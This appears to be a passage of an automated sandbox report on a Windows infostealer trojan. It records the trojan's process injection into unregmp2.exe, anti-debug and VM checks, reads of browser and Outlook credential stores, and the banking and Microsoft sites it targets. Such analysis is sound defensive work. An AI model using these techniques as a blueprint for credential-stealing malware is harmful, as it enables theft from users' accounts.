              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048CFB764_2_048CFB76
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_008A24904_2_008A2490
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_008BC1504_2_008BC150
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0089D3284_2_0089D328
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0089D3304_2_0089D330
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0089B5304_2_0089B530
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0089D5504_2_0089D550
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0089B6804_2_0089B680
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0089B6C94_2_0089B6C9
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_0089B6754_2_0089B675
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_008A5B404_2_008A5B40
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_008A3D404_2_008A3D40
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_046CE4534_2_046CE453
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_046CE7ED4_2_046CE7ED
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_046CE30C4_2_046CE30C
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_046CD8B84_2_046CD8B8
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_046CE97D4_2_046CE97D
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_046CCB634_2_046CCB63
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: String function: 0488F290 appears 105 times
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: String function: 047FB970 appears 280 times
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: String function: 04857E54 appears 111 times
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: String function: 04845130 appears 58 times
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: String function: 0487EA12 appears 86 times
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: String function: 0195B970 appears 280 times
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: String function: 019B7E54 appears 102 times
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: String function: 019DEA12 appears 86 times
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: String function: 019EF290 appears 105 times
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: String function: 019A5130 appears 58 times
              Source: z1companyProfileandproducts.exeStatic PE information: No import functions for PE file found
              Source: z1companyProfileandproducts.exe, 00000000.00000003.2675262891.00000000013B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunregmp2.exej% vs z1companyProfileandproducts.exe
              Source: z1companyProfileandproducts.exe, 00000000.00000003.2606734724.00000000018B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z1companyProfileandproducts.exe
              Source: z1companyProfileandproducts.exe, 00000000.00000003.2604771684.00000000016FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z1companyProfileandproducts.exe
              Source: z1companyProfileandproducts.exe, 00000000.00000002.2711193232.0000000001C01000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z1companyProfileandproducts.exe
              Source: z1companyProfileandproducts.exe, 00000000.00000003.2675262891.000000000134D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: periodtrackConductortrackComposertrackPerformertrackNumbertrackTitleWMContentIDpublisherRatingproviderStylealbumArtistalbumTitleWMCollectionGroupIDWMCollectionIDgenrelabelreleaseDatecommunityRatingdataProviderWM/IsCompilationAverageLevelPeakValueWM/WMCPDistributorIDWM/WMCPDistributorWM/WMShadowFileSourceDRMTypeWM/WMShadowFileSourceFileTypeWM/MediaOriginalBroadcastDateTimeWM/MediaOriginalChannelWM/MediaStationNameWM/SubTitleDescriptionWM/SubscriptionContentIDWM/ContentDistributorWM/ProviderStyleWM/ProviderRatingWM/ProviderWM/ISRCWM/DRMWM/CodecWM/PlaylistDelayWM/RadioStationOwnerWM/RadioStationNameWM/ModifiedByWM/UniqueFileIdentifierWM/WMCollectionGroupIDWM/WMCollectionIDWM/WMContentIDWM/DVDIDWM/TextWM/MoodWM/InitialKeyWM/BeatsPerMinuteWM/ParentalRatingWM/LanguageWM/AudioSourceURLWM/AudioFileURLWM/UserWebURLWM/AuthorURLWM/EncodingTimeWM/EncodingSettingsWM/EncodedByWM/PublisherWM/OriginalFilenameWM/OriginalReleaseYearWM/OriginalAlbumTitleWM/OriginalArtistWM/OriginalLyricistWM/Lyrics_SynchronisedWM/PictureWM/CategoryWM/PeriodWM/MediaClassSecondaryIDWM/MediaClassPrimaryIDWM/VideoFrameRateWM/VideoWidthWM/VideoHeightWM/ProtectionTypeWM/PartOfSetWM/SubTitleWM/ContentGroupDescriptionWM/DirectorWM/ProducerWM/ConductorWM/WriterAspectRatioYAspectRatioXWM/AlbumArtistIsVBRWM/ToolVersionWM/ToolNameWM/TrackNumberWM/LyricsWM/ComposerWM/MCDIWM/GenreIDWM/YearWM/GenreWM/AlbumCoverURLWM/PromotionURLWM/AlbumTitleDRM_IndividualizedVersionDRM_KeyIDCopyrightDescriptionAuthorTitleFileSizeCurrentBitrateIs_ProtectedDuration vs z1companyProfileandproducts.exe
              Source: z1companyProfileandproducts.exe, 00000000.00000003.2675262891.000000000134D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunregmp2.exej% vs z1companyProfileandproducts.exe
              Source: z1companyProfileandproducts.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: z1companyProfileandproducts.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: z1companyProfileandproducts.exeStatic PE information: Section .text
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@4/3
              Source: C:\Windows\SysWOW64\unregmp2.exeFile created: C:\Users\user\AppData\Local\Temp\7291789G1Jump to behavior
              Source: z1companyProfileandproducts.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unregmp2.exe, 00000004.00000002.3346981435.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000004.00000002.3346981435.0000000002C86000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000004.00000002.3346981435.0000000002C8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: z1companyProfileandproducts.exeVirustotal: Detection: 69%
              Source: z1companyProfileandproducts.exeReversingLabs: Detection: 71%
              Source: unknownProcess created: C:\Users\user\Desktop\z1companyProfileandproducts.exe "C:\Users\user\Desktop\z1companyProfileandproducts.exe"
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeProcess created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\SysWOW64\unregmp2.exe"
              Source: C:\Windows\SysWOW64\unregmp2.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeProcess created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\SysWOW64\unregmp2.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: z1companyProfileandproducts.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: unregmp2.pdb source: z1companyProfileandproducts.exe, 00000000.00000003.2675262891.000000000134D000.00000004.00000020.00020000.00000000.sdmp, cAPvHN0KfrpQXKK.exe, 00000003.00000002.3347268047.000000000145E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: z1companyProfileandproducts.exe, 00000000.00000003.2604771684.00000000015DC000.00000004.00000020.00020000.00000000.sdmp, z1companyProfileandproducts.exe, 00000000.00000002.2711193232.0000000001ACE000.00000040.00001000.00020000.00000000.sdmp, z1companyProfileandproducts.exe, 00000000.00000002.2711193232.0000000001930000.00000040.00001000.00020000.00000000.sdmp, z1companyProfileandproducts.exe, 00000000.00000003.2606734724.0000000001783000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000004.00000003.2710543672.0000000004474000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000004.00000003.2714618784.0000000004625000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000004.00000002.3347587505.000000000496E000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000004.00000002.3347587505.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: z1companyProfileandproducts.exe, z1companyProfileandproducts.exe, 00000000.00000003.2604771684.00000000015DC000.00000004.00000020.00020000.00000000.sdmp, z1companyProfileandproducts.exe, 00000000.00000002.2711193232.0000000001ACE000.00000040.00001000.00020000.00000000.sdmp, z1companyProfileandproducts.exe, 00000000.00000002.2711193232.0000000001930000.00000040.00001000.00020000.00000000.sdmp, z1companyProfileandproducts.exe, 00000000.00000003.2606734724.0000000001783000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, unregmp2.exe, 00000004.00000003.2710543672.0000000004474000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000004.00000003.2714618784.0000000004625000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000004.00000002.3347587505.000000000496E000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000004.00000002.3347587505.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: unregmp2.pdbGCTL source: z1companyProfileandproducts.exe, 00000000.00000003.2675262891.000000000134D000.00000004.00000020.00020000.00000000.sdmp, cAPvHN0KfrpQXKK.exe, 00000003.00000002.3347268047.000000000145E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cAPvHN0KfrpQXKK.exe, 00000003.00000000.2627217059.0000000000B8F000.00000002.00000001.01000000.00000005.sdmp, cAPvHN0KfrpQXKK.exe, 00000005.00000000.2781026004.0000000000B8F000.00000002.00000001.01000000.00000005.sdmp
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D328C2 push ecx; ret 0_2_00D328DD
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D4E0B3 push FFFFFFCFh; iretd 0_2_00D4E155
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D231A0 push eax; ret 0_2_00D231A2
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D3495C pushad ; ret 0_2_00D34A8C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D3F113 push cs; retf 0_2_00D3F134
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D34A38 pushad ; ret 0_2_00D34A8C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D34A2A pushad ; ret 0_2_00D34A8C
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D393CD push ebx; iretd 0_2_00D393DA
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D39309 push edx; iretd 0_2_00D39310
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D3ACFE push es; retf 0_2_00D3AD02
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D3EDC3 push 6F0BB6AFh; ret 0_2_00D3EDDB
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D385F5 pushfd ; ret 0_2_00D385F6
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D34664 push eax; iretd 0_2_00D34678
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D33E33 push esi; iretd 0_2_00D33E38
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D31F7F push DC38C83Bh; iretd 0_2_00D31FB7
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019609AD push ecx; mov dword ptr [esp], ecx0_2_019609B6
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A1A4FE pushfd ; ret 3_2_04A1A4FF
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A17CDF push ebx; retf 3_2_04A17CE0
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A15D3C push esi; iretd 3_2_04A15D41
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A13E88 push DC38C83Bh; iretd 3_2_04A13EC0
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A2FFBC push FFFFFFCFh; iretd 3_2_04A3005E
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A147CB push ecx; ret 3_2_04A147E6
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A19729 push ebx; retf 3_2_04A1972A
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A1B2D6 push ebx; iretd 3_2_04A1B2E3
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeCode function: 3_2_04A1B212 push edx; iretd 3_2_04A1B219
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_047D27FA pushad ; ret 4_2_047D27F9
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_047D225F pushad ; ret 4_2_047D27F9
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_047D283D push eax; iretd 4_2_047D2858
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_048009AD push ecx; mov dword ptr [esp], ecx4_2_048009B6
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_008A6166 push edx; iretd 4_2_008A616D
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_008A622A push ebx; iretd 4_2_008A6237
              Source: z1companyProfileandproducts.exeStatic PE information: section name: .text entropy: 7.996410137390471
              Source: C:\Windows\SysWOW64\unregmp2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
              Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
              Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
              Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
              Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
              Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
              Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
              Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A096E rdtsc 0_2_019A096E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\unregmp2.exeAPI coverage: 2.6 %
              Source: C:\Windows\SysWOW64\unregmp2.exe TID: 5136Thread sleep count: 46 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exe TID: 5136Thread sleep time: -92000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\unregmp2.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 4_2_008ACD20 FindFirstFileW,FindNextFileW,FindClose,4_2_008ACD20
              Source: unregmp2.exe, 00000004.00000002.3349291012.0000000007B98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,1169642
              Source: 7291789G1.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: 7291789G1.4.drBinary or memory string: discord.comVMware20,11696428655f
              Source: 7291789G1.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: 7291789G1.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: unregmp2.exe, 00000004.00000002.3349291012.0000000007B98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .co.inVMware20,11696428655d
              Source: 7291789G1.4.drBinary or memory string: global block list test formVMware20,11696428655
              Source: 7291789G1.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: unregmp2.exe, 00000004.00000002.3349291012.0000000007B98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rdVMware20,11696428655
              Source: 7291789G1.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: 7291789G1.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: 7291789G1.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: 7291789G1.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: 7291789G1.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: 7291789G1.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: 7291789G1.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: 7291789G1.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: 7291789G1.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: unregmp2.exe, 00000004.00000002.3346981435.0000000002BCA000.00000004.00000020.00020000.00000000.sdmp, cAPvHN0KfrpQXKK.exe, 00000005.00000002.3347566093.0000000001229000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.3002368306.000001B8B77DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: 7291789G1.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: 7291789G1.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: unregmp2.exe, 00000004.00000002.3349291012.0000000007B98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696428655x
              Source: 7291789G1.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: 7291789G1.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: unregmp2.exe, 00000004.00000002.3349291012.0000000007B98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sswords blocklistVMware20,116964+
              Source: 7291789G1.4.drBinary or memory string: AMC password management pageVMware20,11696428655
              Source: 7291789G1.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: 7291789G1.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: 7291789G1.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: 7291789G1.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: 7291789G1.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: 7291789G1.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: 7291789G1.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: 7291789G1.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: unregmp2.exe, 00000004.00000002.3349291012.0000000007B98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zure.comVMware20,11696428655j
              Source: 7291789G1.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: unregmp2.exe, 00000004.00000002.3349291012.0000000007B98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,1
              Source: 7291789G1.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: 7291789G1.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A096E rdtsc 0_2_019A096E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_00D37E73 LdrLoadDll,0_2_00D37E73
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E019F mov eax, dword ptr fs:[00000030h]0_2_019E019F
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E019F mov eax, dword ptr fs:[00000030h]0_2_019E019F
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E019F mov eax, dword ptr fs:[00000030h]0_2_019E019F
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019E019F mov eax, dword ptr fs:[00000030h]0_2_019E019F
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195A197 mov eax, dword ptr fs:[00000030h]0_2_0195A197
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195A197 mov eax, dword ptr fs:[00000030h]0_2_0195A197
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195A197 mov eax, dword ptr fs:[00000030h]0_2_0195A197
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019A0185 mov eax, dword ptr fs:[00000030h]0_2_019A0185
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A04180 mov eax, dword ptr fs:[00000030h]0_2_01A04180
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A04180 mov eax, dword ptr fs:[00000030h]0_2_01A04180
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A1C188 mov eax, dword ptr fs:[00000030h]0_2_01A1C188
